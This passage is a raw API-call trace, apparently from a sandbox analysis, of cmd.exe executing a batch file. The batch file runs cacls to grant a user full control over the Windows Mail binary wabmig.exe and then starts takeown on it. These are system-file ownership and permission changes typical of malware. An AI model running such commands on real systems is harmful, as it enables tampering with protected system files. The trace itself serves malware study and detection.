() returned 0x2 [0172.060] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0x5a44a0 [0172.060] FindClose (in: hFindFile=0x5a44a0 | out: hFindFile=0x5a44a0) returned 1 [0172.060] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0172.060] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0172.060] GetConsoleTitleW (in: lpConsoleTitle=0x30ec24, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.061] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a4778, lpFilePart=0x30e744 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30e744*="Desktop") returned 0x25 [0172.061] SetErrorMode (uMode=0x0) returned 0x1 [0172.061] GetProcessHeap () returned 0x590000 [0172.061] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4770, Size=0x60) returned 0x5a4770 [0172.061] GetProcessHeap () returned 0x590000 [0172.061] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4770) returned 0x60 [0172.061] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0172.061] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0172.061] GetProcessHeap () returned 0x590000 [0172.061] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a47d8 [0172.061] GetProcessHeap () returned 0x590000 [0172.061] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a4900 [0172.061] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.062] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0xffffffff [0172.062] GetLastError () returned 0x2 [0172.062] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cacls", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0xffffffff [0172.062] GetLastError () returned 0x2 [0172.062] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0x5a4ab0 [0172.063] FindClose (in: hFindFile=0x5a4ab0 | out: hFindFile=0x5a4ab0) returned 1 [0172.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0xffffffff [0172.063] GetLastError () returned 0x2 [0172.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0x5a4ab0 [0172.064] FindClose (in: hFindFile=0x5a4ab0 | out: hFindFile=0x5a4ab0) returned 1 [0172.064] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0172.064] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0172.064] GetConsoleTitleW (in: lpConsoleTitle=0x30e9b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0172.064] InitializeProcThreadAttributeList (in: lpAttributeList=0x30e840, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30e908 | out: lpAttributeList=0x30e840, lpSize=0x30e908) returned 1 [0172.064] UpdateProcThreadAttribute (in: lpAttributeList=0x30e840, dwFlags=0x0, Attribute=0x60001, lpValue=0x30e900, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30e840, lpPreviousValue=0x0) returned 1 [0172.064] GetStartupInfoW (in: lpStartupInfo=0x30e7fc | out: lpStartupInfo=0x30e7fc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0172.064] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0172.067] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30e89c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30e8e8 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Mail\\wabmig.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C", lpProcessInformation=0x30e8e8*(hProcess=0x74, hThread=0x78, dwProcessId=0x5b8, dwThreadId=0xb18)) returned 1 [0172.092] CloseHandle (hObject=0x78) returned 1 [0172.092] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0172.092] GetProcessHeap () returned 0x590000 [0172.092] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f80 | out: hHeap=0x590000) returned 1 [0172.092] GetEnvironmentStringsW () returned 0x5a4bf8* [0172.092] GetProcessHeap () returned 0x590000 [0172.092] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5f80 [0172.093] FreeEnvironmentStringsW (penv=0x5a4bf8) returned 1 [0172.093] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0184.374] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x30e7dc | out: lpExitCode=0x30e7dc*=0x1f57) returned 1 [0184.374] CloseHandle (hObject=0x74) returned 1 [0184.375] _vsnwprintf (in: _Buffer=0x30e924, _BufferCount=0x13, _Format="%08X", _ArgList=0x30e7e8 | out: _Buffer="00001F57") returned 8 [0184.375] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00001F57") returned 1 [0184.375] GetProcessHeap () returned 0x590000 [0184.375] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a5f80 | out: hHeap=0x590000) returned 1 [0184.375] GetEnvironmentStringsW () returned 0x5a5f80* [0184.375] GetProcessHeap () returned 0x590000 [0184.375] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a6ae8 [0184.375] FreeEnvironmentStringsW (penv=0x5a5f80) returned 1 [0184.375] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0184.375] GetProcessHeap () returned 0x590000 [0184.375] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae8 | out: hHeap=0x590000) returned 1 [0184.375] GetEnvironmentStringsW () returned 0x5a5f80* [0184.375] GetProcessHeap () returned 0x590000 [0184.375] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb5c) returned 0x5a6ae8 [0184.376] FreeEnvironmentStringsW (penv=0x5a5f80) returned 1 [0184.376] GetProcessHeap () returned 0x590000 [0184.376] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x590ce8 | out: hHeap=0x590000) returned 1 [0184.376] DeleteProcThreadAttributeList (in: lpAttributeList=0x30e840 | out: lpAttributeList=0x30e840) [0184.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0184.377] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.377] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0184.377] _get_osfhandle (_FileHandle=0) returned 0x3 [0184.377] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0184.378] SetConsoleInputExeNameW () returned 0x1 [0184.378] GetConsoleOutputCP () returned 0x1b5 [0184.378] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0184.378] SetThreadUILanguage (LangId=0x0) returned 0x409 [0184.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x30f05c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0184.379] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0184.379] _get_osfhandle (_FileHandle=3) returned 0x74 [0184.379] SetFilePointer (in: hFile=0x74, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0184.379] GetProcessHeap () returned 0x590000 [0184.379] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4a30 | out: hHeap=0x590000) returned 1 [0184.379] GetProcessHeap () returned 0x590000 [0184.379] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4900 | out: hHeap=0x590000) returned 1 [0184.379] GetProcessHeap () returned 0x590000 [0184.379] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a47d8 | out: hHeap=0x590000) returned 1 [0184.379] GetProcessHeap () returned 0x590000 [0184.379] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4770 | out: hHeap=0x590000) returned 1 [0184.379] GetProcessHeap () returned 0x590000 [0184.379] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a46b8 | out: hHeap=0x590000) returned 1 [0184.379] GetProcessHeap () returned 0x590000 [0184.379] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a44a0 | out: hHeap=0x590000) returned 1 [0184.379] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4420 | out: hHeap=0x590000) returned 1 [0184.380] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a42f0 | out: hHeap=0x590000) returned 1 [0184.380] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a41c8 | out: hHeap=0x590000) returned 1 [0184.380] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4160 | out: hHeap=0x590000) returned 1 [0184.380] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x591218 | out: hHeap=0x590000) returned 1 [0184.380] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x59f4b8 | out: hHeap=0x590000) returned 1 [0184.380] GetProcessHeap () returned 0x590000 [0184.380] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5911b8 | out: hHeap=0x590000) returned 1 [0184.380] _get_osfhandle (_FileHandle=3) returned 0x74 [0184.380] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0184.380] ReadFile (in: hFile=0x74, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x30f040, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x30f040*=0xc2, lpOverlapped=0x0) returned 1 [0184.380] SetFilePointer (in: hFile=0x74, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0184.380] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0184.381] _get_osfhandle (_FileHandle=3) returned 0x74 [0184.381] GetFileType (hFile=0x74) returned 0x1 [0184.381] _get_osfhandle (_FileHandle=3) returned 0x74 [0184.381] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0184.381] GetProcessHeap () returned 0x590000 [0184.381] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5b4af8 [0184.381] GetProcessHeap () returned 0x590000 [0184.381] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5b4af8 | out: hHeap=0x590000) returned 1 [0184.383] GetProcessHeap () returned 0x590000 [0184.383] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x66) returned 0x591218 [0184.385] _tell (_FileHandle=3) returned 47 [0184.385] _close (_FileHandle=3) returned 0 [0184.385] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30ee14 | out: _Buffer="\r\n") returned 2 [0184.385] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.385] GetFileType (hFile=0x7) returned 0x2 [0184.385] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0184.386] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd4 | out: lpMode=0x30edd4) returned 1 [0184.386] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.386] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30ee00, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30ee00*=0x2) returned 1 [0184.388] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0184.388] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0184.388] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x30ee10 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0184.388] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x30ee10 | out: _Buffer=">") returned 1 [0184.388] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.388] GetFileType (hFile=0x7) returned 0x2 [0184.389] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0184.389] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30edd8 | out: lpMode=0x30edd8) returned 1 [0184.389] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.389] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x30ee04, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x30ee04*=0x26) returned 1 [0184.390] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.390] GetFileType (hFile=0x7) returned 0x2 [0184.390] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0184.390] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f05c | out: lpMode=0x30f05c) returned 1 [0184.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.391] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5a5768*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x30f088, lpReserved=0x0 | out: lpBuffer=0x5a5768*, lpNumberOfCharsWritten=0x30f088*=0x7) returned 1 [0184.391] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x30f094 | out: _Buffer=" /F \"C:\\Program Files\\Windows Mail\\wabmig.exe\" ") returned 47 [0184.391] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.391] GetFileType (hFile=0x7) returned 0x2 [0184.392] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0184.392] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f054 | out: lpMode=0x30f054) returned 1 [0184.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.392] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x30f080, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f080*=0x2f) returned 1 [0184.394] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x30f0b4 | out: _Buffer="\r\n") returned 2 [0184.394] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.394] GetFileType (hFile=0x7) returned 0x2 [0184.395] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0184.395] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f074 | out: lpMode=0x30f074) returned 1 [0184.395] _get_osfhandle (_FileHandle=1) returned 0x7 [0184.395] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f0a0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x30f0a0*=0x2) returned 1 [0184.397] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0184.397] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0184.397] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0184.397] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0184.397] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0184.397] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0184.398] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0184.398] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0184.398] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0184.398] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0184.398] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0184.398] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0184.398] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0184.398] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0184.398] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0184.398] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0184.398] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0184.398] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0184.398] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0184.398] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0184.398] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0184.398] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0184.398] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0184.398] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0184.398] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0184.398] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0184.398] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0184.398] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0184.398] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0184.398] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0184.398] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0184.398] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0184.398] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0184.399] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0184.399] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0184.399] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0184.399] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0184.399] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0184.399] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0184.399] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0184.399] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0184.399] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0184.399] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a4168, lpFilePart=0x30ee58 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30ee58*="Desktop") returned 0x25 [0184.399] SetErrorMode (uMode=0x0) returned 0x1 [0184.400] GetProcessHeap () returned 0x590000 [0184.400] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a4160, Size=0x64) returned 0x5a4160 [0184.400] GetProcessHeap () returned 0x590000 [0184.400] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a4160) returned 0x64 [0184.400] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.400] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.400] GetProcessHeap () returned 0x590000 [0184.400] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a41d0 [0184.400] GetProcessHeap () returned 0x590000 [0184.400] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a42f8 [0184.400] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.400] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0xffffffff [0184.401] GetLastError () returned 0x2 [0184.401] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0xffffffff [0184.401] GetLastError () returned 0x2 [0184.401] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0x591288 [0184.402] FindClose (in: hFindFile=0x591288 | out: hFindFile=0x591288) returned 1 [0184.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0xffffffff [0184.402] GetLastError () returned 0x2 [0184.402] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x30ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ebd4) returned 0x591288 [0184.403] FindClose (in: hFindFile=0x591288 | out: hFindFile=0x591288) returned 1 [0184.403] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.403] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.403] GetConsoleTitleW (in: lpConsoleTitle=0x30ec24, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.403] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a22f8, lpFilePart=0x30e744 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30e744*="Desktop") returned 0x25 [0184.403] SetErrorMode (uMode=0x0) returned 0x1 [0184.403] GetProcessHeap () returned 0x590000 [0184.403] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a22f0, Size=0x64) returned 0x5a22f0 [0184.403] GetProcessHeap () returned 0x590000 [0184.403] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a22f0) returned 0x64 [0184.404] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0184.404] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0184.404] GetProcessHeap () returned 0x590000 [0184.404] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x120) returned 0x5a46c0 [0184.404] GetProcessHeap () returned 0x590000 [0184.404] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x238) returned 0x5a47e8 [0184.404] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.404] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0xffffffff [0184.404] GetLastError () returned 0x2 [0184.405] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\takeown", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0xffffffff [0184.405] GetLastError () returned 0x2 [0184.405] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.405] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0x591288 [0184.405] FindClose (in: hFindFile=0x591288 | out: hFindFile=0x591288) returned 1 [0184.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0xffffffff [0184.406] GetLastError () returned 0x2 [0184.406] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x30e4c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e4c0) returned 0x591288 [0184.406] FindClose (in: hFindFile=0x591288 | out: hFindFile=0x591288) returned 1 [0184.406] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0184.406] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0184.406] GetConsoleTitleW (in: lpConsoleTitle=0x30e9b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0184.407] InitializeProcThreadAttributeList (in: lpAttributeList=0x30e840, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30e908 | out: lpAttributeList=0x30e840, lpSize=0x30e908) returned 1 [0184.407] UpdateProcThreadAttribute (in: lpAttributeList=0x30e840, dwFlags=0x0, Attribute=0x60001, 